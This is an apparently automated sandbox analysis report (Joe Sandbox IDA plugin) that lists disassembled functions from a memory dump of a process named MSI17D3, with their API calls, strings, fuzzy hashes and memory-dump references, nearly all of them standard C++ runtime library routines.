Instruction ID: 816e93e6b39468cf815dc4444329082c2cc70e5c0c34c732630614d4c55edbac
Opcode Fuzzy Hash: 61e67b9219d6bcf9dd493e6d4df56efdafb9e4a98ca79ae8c9c6731809ff9c2a
Instruction Fuzzy Hash: EC6192B1D00748DFDB10DFA4C941BDEBBB8FF14304F14425AE955AB281E7B5AA48CB91

Function 00CCD3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCD3D2

Part of subcall function 00CC254E: __EH_prolog3.LIBCMT ref: 00CC2555
Part of subcall function 00CC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F
Part of subcall function 00CC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0

_Find_elem.LIBCPMT ref: 00CCD46E

Strings

%.0Lf, xrefs: 00CCD419
0123456789-, xrefs: 00CCD41E

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: %.0Lf$0123456789-
API String ID: 2544715827-3094241602
Opcode ID: cbfcf7890155f39d0d1cd10f0944c56e9e0ee261ecda2a64ce847d5546323414
Instruction ID: 8a46d9cad9163955f1ae7b802314bab11e96a75ca7eeba81fde31ebf40c8bb5d
Opcode Fuzzy Hash: cbfcf7890155f39d0d1cd10f0944c56e9e0ee261ecda2a64ce847d5546323414
Instruction Fuzzy Hash: DB414B31900218DFCF15DFA4C880EEDBBB5FF08314F104169E915AB256DB30EA56DBA1

Function 00CCD66F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCD676

Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E

_Find_elem.LIBCPMT ref: 00CCD712

Strings

0123456789-, xrefs: 00CCD6C2
0123456789-, xrefs: 00CCD6BD

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 3042121994-2494171821
Opcode ID: 706fce19bb0dd704838c6102d2e64a12396c2b7beed3c82c497c1b4ea502f62e
Instruction ID: 9b11308fb64fd0d45d2a8bc46bfca078a27092df1ab261a7473c330a82a9d1c7
Opcode Fuzzy Hash: 706fce19bb0dd704838c6102d2e64a12396c2b7beed3c82c497c1b4ea502f62e
Instruction Fuzzy Hash: F7416C71900218DFCF15DFA4C880AEEBBB5FF08310F100169F912AB255DB30EA56DBA2

Function 00CD175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD1761

Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422

_Find_elem.LIBCPMT ref: 00CD17FB

Strings

0123456789-, xrefs: 00CD17A8
0123456789-, xrefs: 00CD17AD

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 3042121994-2494171821
Opcode ID: d63fdb7750223fc838d4fd01d220c6fe8c56195646cf2cd5b092d93233be9542
Instruction ID: a37e81d5b8e00a1b05d908bcac8f252fc5c581047ef9e25a6efff3cfb7a70d63
Opcode Fuzzy Hash: d63fdb7750223fc838d4fd01d220c6fe8c56195646cf2cd5b092d93233be9542
Instruction Fuzzy Hash: 80415B31900209EFCF15DFA8D881AEEBBB5FF04310F11415AFA11AB252DB34DA46EB91

Function 00CC8386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC838D

Part of subcall function 00CC1C42: _Maklocstr.LIBCPMT ref: 00CC1C62
Part of subcall function 00CC1C42: _Maklocstr.LIBCPMT ref: 00CC1C7F
Part of subcall function 00CC1C42: _Maklocstr.LIBCPMT ref: 00CC1C9C
Part of subcall function 00CC1C42: _Maklocchr.LIBCPMT ref: 00CC1CAE
Part of subcall function 00CC1C42: _Maklocchr.LIBCPMT ref: 00CC1CC1

_Mpunct.LIBCPMT ref: 00CC841A
_Mpunct.LIBCPMT ref: 00CC8434

Strings

$+xv, xrefs: 00CC843F

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: fb17ea11e3ccac4e018296a296c64d790095ba57aba7db64493edfa6837fe567
Instruction ID: 1abe9bb3896fffc6b7d2aa8f15e5a6d72fdc3f0c46daab542df9c9991f8b697c
Opcode Fuzzy Hash: fb17ea11e3ccac4e018296a296c64d790095ba57aba7db64493edfa6837fe567
Instruction Fuzzy Hash: 7721B6B1904B926ED725DF75C490B7BBEF8AB09300F08455EF459C7A42D730E606DBA0

Function 00CCFFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCFFF1
_Mpunct.LIBCPMT ref: 00CD007E
_Mpunct.LIBCPMT ref: 00CD0098

Strings

$+xv, xrefs: 00CD00A3

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 3ac499e26f84267f8fb8d7c4782713bddf8c5c8d3092727cbb3ac9b8e96590ab
Instruction ID: 152fa165dfced5aa7032d6ed907ef0c19f08b1c8e6dcf46ba60231a89358dc38
Opcode Fuzzy Hash: 3ac499e26f84267f8fb8d7c4782713bddf8c5c8d3092727cbb3ac9b8e96590ab
Instruction Fuzzy Hash: EB21B2B1804B916FD725DF79C494B7BBEF8AB09300F14491EE5A9C7A42D730E601DB90

Function 00CB24C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00CB1434,?,00000000), ref: 00CB2569
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00CB1434,?,00000000), ref: 00CB2589
LocalFree.KERNEL32(?,00CB1434,?,00000000), ref: 00CB25DF
CloseHandle.KERNEL32(00000000,665E9022,?,00000000,00CF3C40,000000FF,00000008,?,?,?,?,00CB1434,?,00000000), ref: 00CB2633
LocalFree.KERNEL32(?,665E9022,?,00000000,00CF3C40,000000FF,00000008,?,?,?,?,00CB1434), ref: 00CB2647

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Local$AllocFree$CloseHandle
String ID:
API String ID: 1291444452-0
Opcode ID: 3df1dfc3d1bd90987751af4632c7deccdbddda2aacae244b2355a18ff34899fd
Instruction ID: 74d306108debfc72b7707cbfa9740c8dd64f1819f2f0834dbd96d4ac02ce7365
Opcode Fuzzy Hash: 3df1dfc3d1bd90987751af4632c7deccdbddda2aacae244b2355a18ff34899fd
Instruction Fuzzy Hash: 1441D7726042159BC7249F68D894BEAB7D8EB49360F10472AF566C76E0EB30DD48C7A1

Function 00CF1D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(665E9022,?,00000000,?), ref: 00CF1DFE

Part of subcall function 00CEA9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00CE6F5E,?,00000000,-00000008), ref: 00CEAA67

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CF2059
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CF20A1
GetLastError.KERNEL32 ref: 00CF2144

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c666bf4b438318aa0fecc34ab9fec745df55b6dcc757636cccb4c4cb45420dad
Instruction ID: 72a8b3db0788bcdf81b9d70fafcfb3258d975f5dce1844b9613bda3d6a93468b
Opcode Fuzzy Hash: c666bf4b438318aa0fecc34ab9fec745df55b6dcc757636cccb4c4cb45420dad
Instruction Fuzzy Hash: 89D15975D002589FCF15CFA8D880AEDBBB5FF09310F18856AEA26EB351D730A941CB55

Function 00CD0116 Relevance: 6.3, APIs: 4, Instructions: 287COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CD011D
collate.LIBCPMT ref: 00CD0126

Part of subcall function 00CCEDF2: __EH_prolog3_GS.LIBCMT ref: 00CCEDF9
Part of subcall function 00CCEDF2: __Getcoll.LIBCPMT ref: 00CCEE5D

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

__Getcoll.LIBCPMT ref: 00CD016C
numpunct.LIBCPMT ref: 00CD03C4

Part of subcall function 00CB6330: LocalAlloc.KERNEL32(00000040,?,00CC0E04,00000020,?,?,00CB9942,00000000,665E9022,?,?,?,?,00CF50DD,000000FF), ref: 00CB6336

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 259100098-0
Opcode ID: ed7b35404e74544eaa44149d0e8b3b2a1beb9de20f56e52273d6f13e11cea16b
Instruction ID: b3e697696786ea2fb8230c59e0e55a4267a2ee74c34bf1ff3481b51e1c03bfda
Opcode Fuzzy Hash: ed7b35404e74544eaa44149d0e8b3b2a1beb9de20f56e52273d6f13e11cea16b
Instruction Fuzzy Hash: 4691DBB1D012156BE7107FB98C16BBF7AE9DF41320F20442EF919A7391DAB44901A7B2

Function 00CD5A58 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00CD5B1F
___AdjustPointer.LIBCMT ref: 00CD5B42
___AdjustPointer.LIBCMT ref: 00CD5BDE

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: da86d13401f36fa2ee23215f92610fc62d15fee119a1fa9ba355b8c7e91ee79f
Instruction ID: dd13089b5763b947ff2cfa5f48587bb547a950ffe0dd373dd5145c7e8b2dcf93
Opcode Fuzzy Hash: da86d13401f36fa2ee23215f92610fc62d15fee119a1fa9ba355b8c7e91ee79f
Instruction Fuzzy Hash: 1551F376600B06AFDB288F14D841BBAB7A4EF44311F14462FEB158B391E731EE40EB90

Function 00CE24E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0d00ff2596ef39acccc84e9548b44a46f5a6f0eaa703e035479edb82859bbb
Instruction ID: 28bff5a2a9f58b91b348e8669d072e1caf39bb900657bbe15e3aea1edc15c74b
Opcode Fuzzy Hash: ec0d00ff2596ef39acccc84e9548b44a46f5a6f0eaa703e035479edb82859bbb
Instruction Fuzzy Hash: A921D1B1605285AFDB20AF63CD61F6E77ACBF443607104616F92987250EB30EE10A760

Function 00CB6FB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00CB6FB7

Strings

Call to ShellExecute() for verb<, xrefs: 00CB6FC1
> returned:, xrefs: 00CB6FC6
Last error=, xrefs: 00CB7011

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLast
String ID: > returned:$Call to ShellExecute() for verb<$Last error=
API String ID: 1452528299-1781106413
Opcode ID: 9b13bdb1a8c99b083620a352c6d58c225fe9f292a06f0199194c6f9b1495cda6
Instruction ID: 441c8ed61dc44f3285a8b4f4a264b45d70e27922389aaa29d72b4a1edb0f9bc0
Opcode Fuzzy Hash: 9b13bdb1a8c99b083620a352c6d58c225fe9f292a06f0199194c6f9b1495cda6
Instruction Fuzzy Hash: 7321A159B1022186CB342F78E40137AB2E0EF94754F65186FECC8D7390FAA98C8283A5

Function 00CBF3D9 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CBF3E0
std::_Lockit::_Lockit.LIBCPMT ref: 00CBF3EA
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBF48E
Concurrency::cancel_current_task.LIBCPMT ref: 00CBF499

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID:
API String ID: 4244582100-0
Opcode ID: 59420cbc0965f76710c0112243ede11986e25822e908c5bebe75170bbd14edf5
Instruction ID: 7faa685b3ffa487343a467edfed86764e1aba078d2af3f9c2e2844ce8ec53381
Opcode Fuzzy Hash: 59420cbc0965f76710c0112243ede11986e25822e908c5bebe75170bbd14edf5
Instruction Fuzzy Hash: 56214C34A0061ADFDB04EF14C851AADB771FF48711F108569E9259B7A1CB70EE51CF81

Function 00CBCCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,665E9022), ref: 00CBCD1C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00CBCD3C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00CBCD6D
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00CBCD86

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 58af6b28f1faf34fda211a760357635dcc10daa386ebc2cc725100d1638bad43
Instruction ID: 31d0d1c7b7605bfd6381e4c5dd9fde010105835e9adb8e9290742221606668f7
Opcode Fuzzy Hash: 58af6b28f1faf34fda211a760357635dcc10daa386ebc2cc725100d1638bad43
Instruction Fuzzy Hash: 0721B174941318ABD7209F54DC49FAEBBB8EB05B14F100229F615A72C0DBB06A0487E4

Function 00CC22FA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2301
std::_Lockit::_Lockit.LIBCPMT ref: 00CC230B

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC235C
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC237C

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 8a0e84891e406c6d7d77660d87b8c1f419492a1ff027ebb032cbeba36441c914
Instruction ID: 21dc12e9f45522275d4a7af1fb8f105d04348d837b179b0cd09a5b985490e04a
Opcode Fuzzy Hash: 8a0e84891e406c6d7d77660d87b8c1f419492a1ff027ebb032cbeba36441c914
Instruction Fuzzy Hash: B201C071900259DBCB05EBA4E841BBE7765AF84710F28050EF610AB3D1CF349E01DBA2

Function 00CBD6BD Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CBD6C4
std::_Lockit::_Lockit.LIBCPMT ref: 00CBD6CE

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CBD71F
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD73F

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: f63c3880e286310d58dbfc70a9fec7b9487ed54c4fd8a60b4485838dcfd80ef1
Instruction ID: caa1b680c0e6cd8754bed3b9eedcec7279636ee2f831891d3c803f5c85807d73
Opcode Fuzzy Hash: f63c3880e286310d58dbfc70a9fec7b9487ed54c4fd8a60b4485838dcfd80ef1
Instruction Fuzzy Hash: 4701CC35900219DBCB05EBA4C845BFE7BA5BF80720F24050EF512AB392DF309E01DBA2

Function 00CBD7E7 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CBD7EE
std::_Lockit::_Lockit.LIBCPMT ref: 00CBD7F8

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CBD849
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD869

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 6c90ef439bb658d511e0235a1ceb285a806e5d3e8871778e67fa8a5c1be63799
Instruction ID: 8cb48faa735eb712f4298894b739b91e4399509de602fb8cdc8279430f62d289
Opcode Fuzzy Hash: 6c90ef439bb658d511e0235a1ceb285a806e5d3e8871778e67fa8a5c1be63799
Instruction Fuzzy Hash: 2201AD72900219DBCB15ABA4D842BFE77A5AF80721F24040AF512AB3D2DF709E01D7A2

Function 00CC27A2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC27A9
std::_Lockit::_Lockit.LIBCPMT ref: 00CC27B3

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2804
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2824

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: b3fc3b54b99106e948984381f2797ab13db9db9d529d9f59925482a310d76121
